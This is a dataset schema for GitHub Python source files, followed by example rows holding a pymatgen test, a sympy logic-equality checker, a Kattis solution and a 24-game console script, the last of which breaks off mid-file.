Schema (column: dtype, value range)

hexsha: stringlengths, min 40, max 40
size: int64, min 7, max 1.04M
ext: stringclasses, 10 values
lang: stringclasses, 1 value
max_stars_repo_path: stringlengths, min 4, max 247
max_stars_repo_name: stringlengths, min 4, max 125
max_stars_repo_head_hexsha: stringlengths, min 40, max 78
max_stars_repo_licenses: sequencelengths, min 1, max 10
max_stars_count: int64, min 1, max 368k
max_stars_repo_stars_event_min_datetime: stringlengths, min 24, max 24
max_stars_repo_stars_event_max_datetime: stringlengths, min 24, max 24
max_issues_repo_path: stringlengths, min 4, max 247
max_issues_repo_name: stringlengths, min 4, max 125
max_issues_repo_head_hexsha: stringlengths, min 40, max 78
max_issues_repo_licenses: sequencelengths, min 1, max 10
max_issues_count: int64, min 1, max 116k
max_issues_repo_issues_event_min_datetime: stringlengths, min 24, max 24
max_issues_repo_issues_event_max_datetime: stringlengths, min 24, max 24
max_forks_repo_path: stringlengths, min 4, max 247
max_forks_repo_name: stringlengths, min 4, max 125
max_forks_repo_head_hexsha: stringlengths, min 40, max 78
max_forks_repo_licenses: sequencelengths, min 1, max 10
max_forks_count: int64, min 1, max 105k
max_forks_repo_forks_event_min_datetime: stringlengths, min 24, max 24
max_forks_repo_forks_event_max_datetime: stringlengths, min 24, max 24
content: stringlengths, min 1, max 1.04M
avg_line_length: float64, min 1.77, max 618k
max_line_length: int64, min 1, max 1.02M
alphanum_fraction: float64, min 0, max 1
original_content: stringlengths, min 7, max 1.04M
filtered:remove_function_no_docstring: int64, min -102, max 942k
filtered:remove_class_no_docstring: int64, min -354, max 977k
filtered:remove_delete_markers: int64, min 0, max 60.1k
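
The example rows that follow list their fields in the schema order above. As a quick illustration of how the columns combine, here is a minimal sketch of loading rows with this layout using pandas. The Parquet file name is hypothetical, and the star-count threshold and the zero-delta check on the filtered:* columns are only example filters; in the rows shown below, rows whose filtered:* values are all 0 have content identical to original_content.

# Minimal sketch (assumption: the rows are available locally as Parquet; the
# file name "data/train-00000-of-00001.parquet" is hypothetical).
import pandas as pd

df = pd.read_parquet("data/train-00000-of-00001.parquet")

# max_stars_count can be null (see the example rows), so fill it before comparing.
popular = df[df["max_stars_count"].fillna(0) >= 10]

# Example filter: rows where the docstring/marker filters removed nothing.
untouched = df[
    (df["filtered:remove_function_no_docstring"] == 0)
    & (df["filtered:remove_class_no_docstring"] == 0)
    & (df["filtered:remove_delete_markers"] == 0)
]

print(len(df), len(popular), len(untouched))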

hexsha: 6776cf0bd080254a676d541e382d4eb2f31a05f5
size: 7,640   ext: py   lang: Python
max_stars_repo:  path=pymatgen/analysis/tests/test_diffusion_analyzer.py, name=rajeshprasanth/pymatgen, head_hexsha=eb6cd95230c11ac761a96ebf82b98f71177bb71f, licenses=[ "MIT" ], stars_count=null, stars_event_min=null, stars_event_max=null
max_issues_repo: path=pymatgen/analysis/tests/test_diffusion_analyzer.py, name=rajeshprasanth/pymatgen, head_hexsha=eb6cd95230c11ac761a96ebf82b98f71177bb71f, licenses=[ "MIT" ], issues_count=null, issues_event_min=null, issues_event_max=null
max_forks_repo:  path=pymatgen/analysis/tests/test_diffusion_analyzer.py, name=rajeshprasanth/pymatgen, head_hexsha=eb6cd95230c11ac761a96ebf82b98f71177bb71f, licenses=[ "MIT" ], forks_count=1, forks_event_min=2018-10-28T01:41:38.000Z, forks_event_max=2018-10-28T01:41:38.000Z
content:
# coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.

from __future__ import division, unicode_literals

import unittest2 as unittest
import os
import json
import random
import numpy as np
import csv
import scipy.constants as const

from pymatgen.analysis.diffusion_analyzer import DiffusionAnalyzer,\
    get_conversion_factor, fit_arrhenius
from pymatgen.core.structure import Structure
from pymatgen.util.testing import PymatgenTest
from monty.tempfile import ScratchDir

"""
TODO: Change the module doc.
"""

__author__ = "shyuepingong"
__version__ = "0.1"
__maintainer__ = "Shyue Ping Ong"
__email__ = "shyuep@gmail.com"
__status__ = "Beta"
__date__ = "5/2/13"

test_dir = os.path.join(os.path.dirname(__file__), "..", "..", "..",
                        'test_files')

if __name__ == '__main__':
    unittest.main()

avg_line_length: 41.978022   max_line_length: 85   alphanum_fraction: 0.610602
original_content:
# coding: utf-8 # Copyright (c) Pymatgen Development Team. # Distributed under the terms of the MIT License. from __future__ import division, unicode_literals import unittest2 as unittest import os import json import random import numpy as np import csv import scipy.constants as const from pymatgen.analysis.diffusion_analyzer import DiffusionAnalyzer,\ get_conversion_factor, fit_arrhenius from pymatgen.core.structure import Structure from pymatgen.util.testing import PymatgenTest from monty.tempfile import ScratchDir """ TODO: Change the module doc. """ __author__ = "shyuepingong" __version__ = "0.1" __maintainer__ = "Shyue Ping Ong" __email__ = "shyuep@gmail.com" __status__ = "Beta" __date__ = "5/2/13" test_dir = os.path.join(os.path.dirname(__file__), "..", "..", "..", 'test_files') class FuncTest(unittest.TestCase): def test_get_conversion_factor(self): filepath = os.path.join(test_dir, 'LiFePO4.cif') s = Structure.from_file(filepath) # large tolerance because scipy constants changed between 0.16.1 and 0.17 self.assertAlmostEqual(41370704.343540139, get_conversion_factor(s, "Li", 600), delta=20) def test_fit_arrhenius(self): Ea = 0.5 k = const.k / const.e c = 12 temps = np.array([300, 1000, 500]) diffusivities = c * np.exp(-Ea/(k * temps)) diffusivities *= np.array([1.00601834013, 1.00803236262, 0.98609720824]) r = fit_arrhenius(temps, diffusivities) self.assertAlmostEqual(r[0], Ea) self.assertAlmostEqual(r[1], c) self.assertAlmostEqual(r[2], 0.000895566) # when not enough values for error estimate r2 = fit_arrhenius([1, 2], [10, 10]) self.assertAlmostEqual(r2[0], 0) self.assertAlmostEqual(r2[1], 10) self.assertEqual(r2[2], None) class DiffusionAnalyzerTest(PymatgenTest): def test_init(self): # Diffusion vasprun.xmls are rather large. We are only going to use a # very small preprocessed run for testing. Note that the results are # unreliable for short runs. 
with open(os.path.join(test_dir, "DiffusionAnalyzer.json")) as f: dd = json.load(f) d = DiffusionAnalyzer.from_dict(dd) # large tolerance because scipy constants changed between 0.16.1 and 0.17 self.assertAlmostEqual(d.conductivity, 74.165372613735684, 4) self.assertAlmostEqual(d.diffusivity, 1.16083658794e-06, 7) self.assertAlmostEqual(d.conductivity_std_dev, 0.0097244677795984488, 7) self.assertAlmostEqual(d.diffusivity_std_dev, 9.1013023085561779e-09, 7) self.assertArrayAlmostEqual( d.conductivity_components, [45.9109703, 26.2856302, 150.5405727], 3) self.assertArrayAlmostEqual( d.diffusivity_components, [7.49601236e-07, 4.90254273e-07, 2.24649255e-06]) self.assertArrayAlmostEqual( d.conductivity_components_std_dev, [0.0063579, 0.0180862, 0.0217917] ) self.assertArrayAlmostEqual( d.diffusivity_components_std_dev, [8.9465670e-09, 2.4931224e-08, 2.2636384e-08] ) self.assertArrayAlmostEqual( d.max_ion_displacements, [1.4620659693989553, 1.2787303484445025, 3.419618540097756, 2.340104469126246, 2.6080973517594233, 1.3928579365672844, 1.3561505956708932, 1.6699242923686253, 1.0352389639563648, 1.1662520093955808, 1.2322019205885841, 0.8094210554832534, 1.9917808504954169, 1.2684148391206396, 2.392633794162402, 2.566313049232671, 1.3175030435622759, 1.4628945430952793, 1.0984921286753002, 1.2864482076554093, 0.655567027815413, 0.5986961164605746, 0.5639091444309045, 0.6166004192954059, 0.5997911580422605, 0.4374606277579815, 1.1865683960470783, 0.9017064371676591, 0.6644840367853767, 1.0346375380664645, 0.6177630142863979, 0.7952002051914302, 0.7342686123054011, 0.7858047956905577, 0.5570732369065661, 1.0942937746885417, 0.6509372395308788, 1.0876687380413455, 0.7058162184725, 0.8298306317598585, 0.7813913747621343, 0.7337655232056153, 0.9057161616236746, 0.5979093093186919, 0.6830333586985015, 0.7926500894084628, 0.6765180009988608, 0.8555866032968998, 0.713087091642237, 0.7621007695790749]) self.assertEqual(d.sq_disp_ions.shape, (50, 206)) self.assertAlmostEqual(d.max_framework_displacement, 1.18656839605) ss = list(d.get_drift_corrected_structures(10, 1000, 20)) self.assertEqual(len(ss), 50) n = random.randint(0, 49) n_orig = n * 20 + 10 self.assertArrayAlmostEqual( ss[n].cart_coords - d.structure.cart_coords + d.drift[:, n_orig, :], d.disp[:, n_orig, :]) d = DiffusionAnalyzer.from_dict(d.as_dict()) self.assertIsInstance(d, DiffusionAnalyzer) #Ensure summary dict is json serializable. json.dumps(d.get_summary_dict(include_msd_t=True)) d = DiffusionAnalyzer(d.structure, d.disp, d.specie, d.temperature, d.time_step, d.step_skip, smoothed="max") self.assertAlmostEqual(d.conductivity, 74.165372613735684, 4) self.assertAlmostEqual(d.diffusivity, 1.14606446822e-06, 7) d = DiffusionAnalyzer(d.structure, d.disp, d.specie, d.temperature, d.time_step, d.step_skip, smoothed=False) self.assertAlmostEqual(d.conductivity, 27.20479170406027, 4) self.assertAlmostEqual(d.diffusivity, 4.25976905436e-07, 7) d = DiffusionAnalyzer(d.structure, d.disp, d.specie, d.temperature, d.time_step, d.step_skip, smoothed="constant", avg_nsteps=100) self.assertAlmostEqual(d.conductivity, 47.404056230438741, 4) self.assertAlmostEqual(d.diffusivity, 7.4226016496716148e-07, 7) # Can't average over 2000 steps because this is a 1000-step run. 
self.assertRaises(ValueError, DiffusionAnalyzer, d.structure, d.disp, d.specie, d.temperature, d.time_step, d.step_skip, smoothed="constant", avg_nsteps=2000) d = DiffusionAnalyzer.from_structures( list(d.get_drift_corrected_structures()), d.specie, d.temperature, d.time_step, d.step_skip, d.smoothed, avg_nsteps=100) self.assertAlmostEqual(d.conductivity, 47.404056230438741, 4) self.assertAlmostEqual(d.diffusivity, 7.4226016496716148e-07, 7) d.export_msdt("test.csv") with open("test.csv") as f: data = [] for row in csv.reader(f): if row: data.append(row) data.pop(0) data = np.array(data, dtype=np.float64) self.assertArrayAlmostEqual(data[:, 1], d.msd) os.remove("test.csv") if __name__ == '__main__': unittest.main()

filtered:remove_function_no_docstring: 6,595   filtered:remove_class_no_docstring: 34   filtered:remove_delete_markers: 127

hexsha: d94e383e015801e9caaa411360f5d5c3c970581d
size: 9,511   ext: py   lang: Python
max_stars_repo:  path=checker/logic.py, name=ucam-cl-dtg/equality_checker, head_hexsha=6a31d3dd360f821e36c4742e1d5139d7292f8319, licenses=[ "Apache-2.0" ], stars_count=7, stars_event_min=2020-07-18T08:04:27.000Z, stars_event_max=2022-03-07T06:46:17.000Z
max_issues_repo: path=checker/logic.py, name=ucam-cl-dtg/equality_checker, head_hexsha=6a31d3dd360f821e36c4742e1d5139d7292f8319, licenses=[ "Apache-2.0" ], issues_count=1, issues_event_min=2022-03-18T17:05:54.000Z, issues_event_max=2022-03-18T17:05:54.000Z
max_forks_repo:  path=checker/logic.py, name=ucam-cl-dtg/equality_checker, head_hexsha=6a31d3dd360f821e36c4742e1d5139d7292f8319, licenses=[ "Apache-2.0" ], forks_count=1, forks_event_min=2020-07-18T08:04:28.000Z, forks_event_max=2020-07-18T08:04:28.000Z
content:
import sympy from .utils import known_equal_pair, contains_incorrect_symbols from .utils import EqualityType from .parsing import logic_parser, UnsafeInputException __all__ = ["check"] KNOWN_PAIRS = dict() def parse_expression(expression_str, *, local_dict=None): """Take a string containing a mathematical expression and return a sympy expression. Wrap the parsing class function parse_expr(...) and catch any exceptions that occur. - 'local_dict' can be a dictionary of (name, sympy.Symbol(...)) pairs, where the string 'name' will not be split up and will be turned into the symbol specified. It may be None. """ try: return logic_parser.parse_expr(expression_str, local_dict=local_dict) except logic_parser.ParsingException: print("Incorrectly formatted expression.") print("Fail: '{}'.".format(expression_str)) return None def exact_match(test_expr, target_expr): """Test if the entered expression exactly matches the known expression. This performs as little simplification of the boolean expression as possible, allowing only the commutativity or AND and OR. Returns True if the sympy expressions have the same internal structure, and False if not. - 'test_expr' should be the untrusted sympy expression to check. - 'target_expr' should be the trusted sympy expression to match against. """ print("[EXACT TEST]") if test_expr == target_expr: print("Exact Match (with '==')") return True elif sympy.srepr(test_expr) == sympy.srepr(target_expr): # This is a (perfectly acceptable) hack for ordering the atoms of each # term, but a more explicit method may be preferable in the future. print("Exact Match (with 'srepr')") return True else: return False def symbolic_equality(test_expr, target_expr): """Test if two expressions are symbolically equivalent. Use the sympy 'simplify_logic' function to simplify the two boolean expressions as much as possible. Two equilvalent expressions MUST simplify to the same thing, and then they can be tested for equivalence again. Returns True if sympy can determine that the two expressions are equal, and returns False if they are not equal. - 'test_expr' should be the untrusted sympy expression to check. - 'target_expr' should be the trusted sympy expression to match against. """ print("[SYMBOLIC TEST]") try: simplified_target = sympy.simplify_logic(target_expr) simplified_test = sympy.simplify_logic(test_expr) if simplified_target == simplified_test or sympy.srepr(simplified_target) == sympy.srepr(simplified_test): print("Symbolic match.") print("INFO: Adding known pair ({0}, {1})".format(target_expr, test_expr)) KNOWN_PAIRS[(target_expr, test_expr)] = EqualityType.SYMBOLIC return True else: return False except NotImplementedError as e: print("{0}: {1} - Can't check symbolic equality!".format(type(e).__name__, str(e).capitalize())) return False def expr_equality(test_expr, target_expr): """Given two sympy expressions: test for exact, symbolic and numeric equality. Check two sympy expressions for equality, throwing a TypeError if either of the provided sympy objects is not an expression. - 'test_expr' should be the untrusted sympy expression to check. - 'target_expr' should be the trusted sympy expression to match against. 
""" equality_type = EqualityType.EXACT equal = exact_match(test_expr, target_expr) if not equal: # Then try checking for symbolic equality: equality_type = EqualityType.SYMBOLIC equal = symbolic_equality(test_expr, target_expr) return equal, equality_type def general_equality(test_expr, target_expr): """Given two general sympy objects: test for exact, symbolic and numeric equality. - 'test_expr' should be the untrusted sympy object to check. - 'target_expr' should be the trusted sympy object to match against. """ equal, equality_type = known_equal_pair(KNOWN_PAIRS, test_expr, target_expr) # If this is a known pair: return immediately: if equal: return equal, equality_type else: print("[[EXPRESSION CHECK]]") return expr_equality(test_expr, target_expr) def check(test_str, target_str, *, symbols=None, check_symbols=True, description=None, _quiet=False): """The main checking function, calls each of the equality checking functions as required. Returns a dict describing the equality; with important keys being 'equal', and 'equality_type'. The key 'error' is added if something went wrong, and this should always be checked for first. - 'test_str' should be the untrusted string for sympy to parse. - 'target_str' should be the trusted string to parse and match against. - 'symbols' should be a string list or comma separated string of symbols not to split during parsing. - 'check_symbols' indicates whether to verfiy the symbols used in each expression are exactly the same or not; setting this to False will allow symbols which cancel out to be included (probably don't want this in questions). - 'description' is an optional description to print before the checker's output to stdout which can be used to improve logging. - '_quiet' is an internal argument used to suppress some output when this function is called from plus_minus_checker(). """ # Suppress this output if necessary: if not _quiet: print("=" * 50) # For logging purposes, if we have a description: print it! if description is not None: print(description) print("=" * 50) print("[LOGIC]") # If nothing to parse, fail. On server, this will be caught in check_endpoint() if (target_str == "") or (test_str == ""): print("ERROR: No input provided!") if not _quiet: print("=" * 50) return dict(error="Empty string as argument.") # Cleanup the strings before anything is done to them: error_is_test = False try: target_str = logic_parser.cleanup_string(target_str, reject_unsafe_input=True) error_is_test = True test_str = logic_parser.cleanup_string(test_str, reject_unsafe_input=True) except UnsafeInputException: print("ERROR: Input contained non-whitelisted characters!") result = dict(error="Bad input provided!") if error_is_test: print("Test string: '{}'".format(test_str)) result["syntax_error"] = str(True).lower() if not _quiet: print("=" * 50) return result print("Target string: '{}'".format(target_str)) print("Test string: '{}'".format(test_str)) print("[[PARSE EXPRESSIONS]]") # Parse the trusted target expression: target_expr = parse_expression(target_str) # Parse the untrusted test expression: test_expr = parse_expression(test_str) result = dict(target=target_str, test=test_str) if target_expr is None: print("ERROR: TRUSTED EXPRESSION CANNOT BE PARSED!") if not _quiet: print("=" * 50) result["error"] = "Parsing TARGET Expression Failed!" result["code"] = 400 # This is fatal! return result if test_expr is None: print("Incorrectly formatted ToCheck expression.") if not _quiet: print("=" * 50) result["error"] = "Parsing Test Expression Failed!" 
result["syntax_error"] = str(True).lower() return result result["parsed_target"] = str(target_expr) result["parsed_test"] = str(test_expr) # Now check for symbol match and equality: try: print("Parsed Target: {0}\nParsed ToCheck: {1}".format(target_expr, test_expr)) if check_symbols: # Do we have same set of symbols in each? incorrect_symbols = contains_incorrect_symbols(test_expr, target_expr) if incorrect_symbols is not None: print("[[RESULT]]\nEquality: False") if not _quiet: print("=" * 50) result["equal"] = str(False).lower() result["equality_type"] = EqualityType.SYMBOLIC.value result["incorrect_symbols"] = incorrect_symbols return result # Then check for equality proper: equal, equality_type = general_equality(test_expr, target_expr) except (SyntaxError, TypeError, AttributeError) as e: print("Error when comparing expressions: '{}'.".format(e)) if not _quiet: print("=" * 50) result["error"] = "Comparison of expressions failed: '{}'".format(e) return result print("[[RESULT]]") if equal and (equality_type is not EqualityType.EXACT) and ((target_expr, test_expr) not in KNOWN_PAIRS): print("INFO: Adding known pair ({0}, {1})".format(target_expr, test_expr)) KNOWN_PAIRS[(target_expr, test_expr)] = equality_type print("Equality: {}".format(equal)) if not _quiet: print("=" * 50) result["equal"] = str(equal).lower() result["equality_type"] = equality_type.value return result

avg_line_length: 40.819742   max_line_length: 114   alphanum_fraction: 0.66134
original_content:
import sympy from .utils import known_equal_pair, contains_incorrect_symbols from .utils import EqualityType from .parsing import logic_parser, UnsafeInputException __all__ = ["check"] KNOWN_PAIRS = dict() def parse_expression(expression_str, *, local_dict=None): """Take a string containing a mathematical expression and return a sympy expression. Wrap the parsing class function parse_expr(...) and catch any exceptions that occur. - 'local_dict' can be a dictionary of (name, sympy.Symbol(...)) pairs, where the string 'name' will not be split up and will be turned into the symbol specified. It may be None. """ try: return logic_parser.parse_expr(expression_str, local_dict=local_dict) except logic_parser.ParsingException: print("Incorrectly formatted expression.") print("Fail: '{}'.".format(expression_str)) return None def exact_match(test_expr, target_expr): """Test if the entered expression exactly matches the known expression. This performs as little simplification of the boolean expression as possible, allowing only the commutativity or AND and OR. Returns True if the sympy expressions have the same internal structure, and False if not. - 'test_expr' should be the untrusted sympy expression to check. - 'target_expr' should be the trusted sympy expression to match against. """ print("[EXACT TEST]") if test_expr == target_expr: print("Exact Match (with '==')") return True elif sympy.srepr(test_expr) == sympy.srepr(target_expr): # This is a (perfectly acceptable) hack for ordering the atoms of each # term, but a more explicit method may be preferable in the future. print("Exact Match (with 'srepr')") return True else: return False def symbolic_equality(test_expr, target_expr): """Test if two expressions are symbolically equivalent. Use the sympy 'simplify_logic' function to simplify the two boolean expressions as much as possible. Two equilvalent expressions MUST simplify to the same thing, and then they can be tested for equivalence again. Returns True if sympy can determine that the two expressions are equal, and returns False if they are not equal. - 'test_expr' should be the untrusted sympy expression to check. - 'target_expr' should be the trusted sympy expression to match against. """ print("[SYMBOLIC TEST]") try: simplified_target = sympy.simplify_logic(target_expr) simplified_test = sympy.simplify_logic(test_expr) if simplified_target == simplified_test or sympy.srepr(simplified_target) == sympy.srepr(simplified_test): print("Symbolic match.") print("INFO: Adding known pair ({0}, {1})".format(target_expr, test_expr)) KNOWN_PAIRS[(target_expr, test_expr)] = EqualityType.SYMBOLIC return True else: return False except NotImplementedError as e: print("{0}: {1} - Can't check symbolic equality!".format(type(e).__name__, str(e).capitalize())) return False def expr_equality(test_expr, target_expr): """Given two sympy expressions: test for exact, symbolic and numeric equality. Check two sympy expressions for equality, throwing a TypeError if either of the provided sympy objects is not an expression. - 'test_expr' should be the untrusted sympy expression to check. - 'target_expr' should be the trusted sympy expression to match against. 
""" equality_type = EqualityType.EXACT equal = exact_match(test_expr, target_expr) if not equal: # Then try checking for symbolic equality: equality_type = EqualityType.SYMBOLIC equal = symbolic_equality(test_expr, target_expr) return equal, equality_type def general_equality(test_expr, target_expr): """Given two general sympy objects: test for exact, symbolic and numeric equality. - 'test_expr' should be the untrusted sympy object to check. - 'target_expr' should be the trusted sympy object to match against. """ equal, equality_type = known_equal_pair(KNOWN_PAIRS, test_expr, target_expr) # If this is a known pair: return immediately: if equal: return equal, equality_type else: print("[[EXPRESSION CHECK]]") return expr_equality(test_expr, target_expr) def check(test_str, target_str, *, symbols=None, check_symbols=True, description=None, _quiet=False): """The main checking function, calls each of the equality checking functions as required. Returns a dict describing the equality; with important keys being 'equal', and 'equality_type'. The key 'error' is added if something went wrong, and this should always be checked for first. - 'test_str' should be the untrusted string for sympy to parse. - 'target_str' should be the trusted string to parse and match against. - 'symbols' should be a string list or comma separated string of symbols not to split during parsing. - 'check_symbols' indicates whether to verfiy the symbols used in each expression are exactly the same or not; setting this to False will allow symbols which cancel out to be included (probably don't want this in questions). - 'description' is an optional description to print before the checker's output to stdout which can be used to improve logging. - '_quiet' is an internal argument used to suppress some output when this function is called from plus_minus_checker(). """ # Suppress this output if necessary: if not _quiet: print("=" * 50) # For logging purposes, if we have a description: print it! if description is not None: print(description) print("=" * 50) print("[LOGIC]") # If nothing to parse, fail. On server, this will be caught in check_endpoint() if (target_str == "") or (test_str == ""): print("ERROR: No input provided!") if not _quiet: print("=" * 50) return dict(error="Empty string as argument.") # Cleanup the strings before anything is done to them: error_is_test = False try: target_str = logic_parser.cleanup_string(target_str, reject_unsafe_input=True) error_is_test = True test_str = logic_parser.cleanup_string(test_str, reject_unsafe_input=True) except UnsafeInputException: print("ERROR: Input contained non-whitelisted characters!") result = dict(error="Bad input provided!") if error_is_test: print("Test string: '{}'".format(test_str)) result["syntax_error"] = str(True).lower() if not _quiet: print("=" * 50) return result print("Target string: '{}'".format(target_str)) print("Test string: '{}'".format(test_str)) print("[[PARSE EXPRESSIONS]]") # Parse the trusted target expression: target_expr = parse_expression(target_str) # Parse the untrusted test expression: test_expr = parse_expression(test_str) result = dict(target=target_str, test=test_str) if target_expr is None: print("ERROR: TRUSTED EXPRESSION CANNOT BE PARSED!") if not _quiet: print("=" * 50) result["error"] = "Parsing TARGET Expression Failed!" result["code"] = 400 # This is fatal! return result if test_expr is None: print("Incorrectly formatted ToCheck expression.") if not _quiet: print("=" * 50) result["error"] = "Parsing Test Expression Failed!" 
result["syntax_error"] = str(True).lower() return result result["parsed_target"] = str(target_expr) result["parsed_test"] = str(test_expr) # Now check for symbol match and equality: try: print("Parsed Target: {0}\nParsed ToCheck: {1}".format(target_expr, test_expr)) if check_symbols: # Do we have same set of symbols in each? incorrect_symbols = contains_incorrect_symbols(test_expr, target_expr) if incorrect_symbols is not None: print("[[RESULT]]\nEquality: False") if not _quiet: print("=" * 50) result["equal"] = str(False).lower() result["equality_type"] = EqualityType.SYMBOLIC.value result["incorrect_symbols"] = incorrect_symbols return result # Then check for equality proper: equal, equality_type = general_equality(test_expr, target_expr) except (SyntaxError, TypeError, AttributeError) as e: print("Error when comparing expressions: '{}'.".format(e)) if not _quiet: print("=" * 50) result["error"] = "Comparison of expressions failed: '{}'".format(e) return result print("[[RESULT]]") if equal and (equality_type is not EqualityType.EXACT) and ((target_expr, test_expr) not in KNOWN_PAIRS): print("INFO: Adding known pair ({0}, {1})".format(target_expr, test_expr)) KNOWN_PAIRS[(target_expr, test_expr)] = equality_type print("Equality: {}".format(equal)) if not _quiet: print("=" * 50) result["equal"] = str(equal).lower() result["equality_type"] = equality_type.value return result

filtered:remove_function_no_docstring: 0   filtered:remove_class_no_docstring: 0   filtered:remove_delete_markers: 0

hexsha: 559890790ae2649fffcbdb6731e70ef5186638d7
size: 222   ext: py   lang: Python
max_stars_repo:  path=Kattis/How Many Digits/howmanydigits.py, name=DeepSpace2/Comptitive-Programming, head_hexsha=13212d9dbc73ab87519b0596fdb0147d40c7eaa8, licenses=[ "MIT" ], stars_count=1, stars_event_min=2021-11-12T16:39:40.000Z, stars_event_max=2021-11-12T16:39:40.000Z
max_issues_repo: path=Kattis/How Many Digits/howmanydigits.py, name=DeepSpace2/Comptitive-Programming, head_hexsha=13212d9dbc73ab87519b0596fdb0147d40c7eaa8, licenses=[ "MIT" ], issues_count=null, issues_event_min=null, issues_event_max=null
max_forks_repo:  path=Kattis/How Many Digits/howmanydigits.py, name=DeepSpace2/Comptitive-Programming, head_hexsha=13212d9dbc73ab87519b0596fdb0147d40c7eaa8, licenses=[ "MIT" ], forks_count=3, forks_event_min=2021-07-01T11:46:19.000Z, forks_event_max=2021-09-12T13:49:04.000Z
content:
from math import e, log10, pi

while True:
    try:
        n = int(input())
    except EOFError:
        break
    if n == 0:
        print(1)
    else:
        print(int(n * log10(n / e) + log10(2 * pi * n) / 2) + 1)

avg_line_length: 20.181818   max_line_length: 64   alphanum_fraction: 0.463964
original_content:
from math import e, log10, pi

while True:
    try:
        n = int(input())
    except EOFError:
        break
    if n == 0:
        print(1)
    else:
        print(int(n * log10(n / e) + log10(2 * pi * n) / 2) + 1)

filtered:remove_function_no_docstring: 0   filtered:remove_class_no_docstring: 0   filtered:remove_delete_markers: 0

hexsha: 72eb43c27020f9c97d40a6a12b90946e9a888bc7
size: 10,665   ext: py   lang: Python
max_stars_repo:  path=game24/gameconsole.py, name=Adoyan-Grigor/game24, head_hexsha=4619e953ed94248669759850b9efb812ecf54786, licenses=[ "Apache-2.0" ], stars_count=null, stars_event_min=null, stars_event_max=null
max_issues_repo: path=game24/gameconsole.py, name=Adoyan-Grigor/game24, head_hexsha=4619e953ed94248669759850b9efb812ecf54786, licenses=[ "Apache-2.0" ], issues_count=null, issues_event_min=null, issues_event_max=null
max_forks_repo:  path=game24/gameconsole.py, name=Adoyan-Grigor/game24, head_hexsha=4619e953ed94248669759850b9efb812ecf54786, licenses=[ "Apache-2.0" ], forks_count=null, forks_event_min=null, forks_event_max=null
content:
#!/usr/bin/python
# -*- coding: utf-8 -*-

from __future__ import absolute_import, print_function, division

import sys
import argparse
import readline
import random
import traceback

try:
    import builtins
    raw_input = getattr(builtins, 'input')
except ImportError:
    pass

from game24 import calc, game

MSG_MENU_MAIN = '''1. Play (p)
2. Check answer (c)
3. Quit (q)'''

MSG_MENU_PLAY = '''1. Definitely no solutions (n)
2. Give me a hint (h)
3. I gave up, show me the answer (s)
4. Back to the main menu (b)
5. Quit the game (q)'''

MSG_MENU_SET_END = '''1. One more set (n)
2. Back to the main menu (b)
3. Quit the game (q)'''

MSG_MENU_PLAY_RIGHT = '''1. Try other solutions (t)
2. Next hand (n)
3. Show me the answers (s)
4. Quit the game (q)'''

MSG_SELECT = 'Your choice: '
MSG_INVALID_INPUT = 'Invalid input!'

MSG_MENU_HAND_END = '''1. One more hand (n)
2. Quit this set, back to the main menu (b)
3. Quit the game (q)'''

MSG_SELECT = 'Your choice: '
MSG_INVALID_INPUT = 'Invalid input!'
MSG_INVALID_INTEGER = 'Invalid integer: %s'

MSG_PLAY_NEW_SET = 'Set %d'
MSG_PLAY_NEW_HAND = 'Hand %d: %s'
MSG_PLAY_INPUT_EXPR = 'Input your solution or one of the above choices: '
MSG_PLAY_RIGHT = 'Good Job!'
MSG_PLAY_FIND_BUG = '''Great Job!
You not only solved the problem, but also found a bug!
Please report to me with the cards and your solution if you don't mind.'''
MSG_PLAY_WRONG = "Sorry! It's not correct!"
MSG_PLAY_NO_ANSWER = 'Seems no solutions'
MSG_PLAY_NO_CARDS = 'Set end, your result'

MSG_INPUT_NUMBERS = 'Please input %d integers: '

INPUT_EOF = '\x00'

if __name__ == '__main__':
    main()

avg_line_length: 30.913043   max_line_length: 83   alphanum_fraction: 0.509048
original_content:
#!/usr/bin/python # -*- coding: utf-8 -*- from __future__ import absolute_import, print_function, division import sys import argparse import readline import random import traceback try: import builtins raw_input = getattr(builtins, 'input') except ImportError: pass from game24 import calc, game MSG_MENU_MAIN = '''1. Play (p) 2. Check answer (c) 3. Quit (q)''' MSG_MENU_PLAY = '''1. Definitely no solutions (n) 2. Give me a hint (h) 3. I gave up, show me the answer (s) 4. Back to the main menu (b) 5. Quit the game (q)''' MSG_MENU_SET_END = '''1. One more set (n) 2. Back to the main menu (b) 3. Quit the game (q)''' MSG_MENU_PLAY_RIGHT = '''1. Try other solutions (t) 2. Next hand (n) 3. Show me the answers (s) 4. Quit the game (q)''' MSG_SELECT = 'Your choice: ' MSG_INVALID_INPUT = 'Invalid input!' MSG_MENU_HAND_END = '''1. One more hand (n) 2. Quit this set, back to the main menu (b) 3. Quit the game (q)''' MSG_SELECT = 'Your choice: ' MSG_INVALID_INPUT = 'Invalid input!' MSG_INVALID_INTEGER = 'Invalid integer: %s' MSG_PLAY_NEW_SET = 'Set %d' MSG_PLAY_NEW_HAND = 'Hand %d: %s' MSG_PLAY_INPUT_EXPR = 'Input your solution or one of the above choices: ' MSG_PLAY_RIGHT = 'Good Job!' MSG_PLAY_FIND_BUG = '''Great Job! You not only solved the problem, but also found a bug! Please report to me with the cards and your solution if you don't mind.''' MSG_PLAY_WRONG = "Sorry! It's not correct!" MSG_PLAY_NO_ANSWER = 'Seems no solutions' MSG_PLAY_NO_CARDS = 'Set end, your result' MSG_INPUT_NUMBERS = 'Please input %d integers: ' INPUT_EOF = '\x00' class GameConsole(game.Game): def __init__(self, target=24, count=4, face2ten=False, showcard=False): super(GameConsole, self).__init__(target, count, face2ten) self.showcard = showcard @staticmethod def raw_input_ex(prompt='', default=''): '''enhance raw_input to support default input and also flat EOF''' try: readline.set_startup_hook(lambda: readline.insert_text(default)) try: return input(prompt) finally: readline.set_startup_hook() except EOFError: return INPUT_EOF @staticmethod def print_title(title, dechar='', delen=50): print(dechar * delen) print(title) print(dechar * delen) @staticmethod def ui_menu(menu, choices, eof=True): '''show a menu, and return the selection''' GameConsole.print_title(menu, dechar='-') while True: r = GameConsole.raw_input_ex(MSG_SELECT).strip() if r == '' or (r in choices and len(r) > 1): print(MSG_INVALID_INPUT) continue elif r in choices or (eof and r == INPUT_EOF): print() return r print(MSG_INVALID_INPUT) def ui_check_answer(self): '''show answers for user provided integers''' while True: r = self.raw_input_ex(MSG_INPUT_NUMBERS % self.count).strip() try: integers = [int(s) for s in r.strip().split()] except ValueError: print(MSG_INVALID_INPUT) continue if len(integers) != self.count: print(MSG_INVALID_INPUT) continue break answers = calc.solve(integers, self.target) if answers: s = '\n'.join([str(expr) for 